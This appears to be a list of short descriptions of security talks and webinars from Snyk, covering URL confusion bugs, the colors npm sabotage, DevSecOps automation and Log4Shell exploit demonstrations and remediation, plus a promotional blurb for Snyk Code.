We talk with the Claroty team and Daniel Stenberg, creator of curl, about URL Confusion Vulnerabilities.

Brian and Kyle chat with Johannes about the project!

On January 8, 2022, the open source maintainer of the wildly popular npm package colors, published colors@1.4.1 and colors@1.4.44-liberty-2 in which they intentionally introduced an offending commit that adds an infinite loop to the source code. The infinite loop is triggered and executed immediately upon initialization of the package’s source code, and would result in a Denial of Service (DoS) to any Node.js server using it.

Navigating the world of secure software development is hard. There is a lot of noise and not enough time to investigate everything thoroughly. Make your life and the lives of your colleagues easier by building a world-class DevSecOps automation pipeline. Automate feedback delivery in a way that makes sense. It doesn’t have to be hard; automate the pain away!

We hear a lot about DevOps but how do we turn it from myth into reality? In this panel with Waleed Arshad, Community Manager at Snyk, Frank Dornberger, Team lead of DevSecOps at movingimage EVP GmbH, and Idir Ouhab Meskine, Staff Solutions Engineer at Splunk, we're go over: Waleed Arshad, Community Manager at Snyk Frank Dornberger, Teamlead DevSecOps at movingimage EVP GmbH Idir Ouhab Meskine, Staff Solutions Engineer at Splunk

Note: As of Dec. 28, 2 PM PST, we recommend upgrading to the latest Log4j version. We give a brief overview of the vulnerability and dive right into some examples of the exploit in action. We then show several real-world remediation approaches as well as other fixes outside code.. We give a final round of fun demos, including container and IaC hacks as well as Java-based game hacks. We wrap up with a great list of takeaway resources and answer your questions.

Demonstration of an RCE against the Log4Shell / CVE-2021-44228 vulnerability on a PoC Java EE app running on Kubernetes. I also go over a few mitigation steps you can take to reduce your exposure to this and other such exploits. References mentioned in the video: Snyk helps software-driven businesses develop fast and stay secure. Continuously find and fix vulnerabilities for npm, Maven, NuGet, RubyGems, PyPI and more.

In this recorded session, we present a live hack webinar on the Log4Shell exploit. We give a brief overview of the vulnerability and dive right into some examples of the exploit in action. We then show several real-world remediation approaches as well as other fixes outside code. We give a final round of fun demos, including container and IaC hacks as well as Java-based game hacks. We wrap up with a great list of takeaway resources and answer your questions.

Snyk Code is developer-first: embedding SAST as part of the development process, enabling developers to build software securely during development, and not trying to find and fix problems after the code is compiled. Snyk Code works in the IDEs and SCMs developers use to build and review software and provides fast, actionable, meaningful results to fix issues in real-time.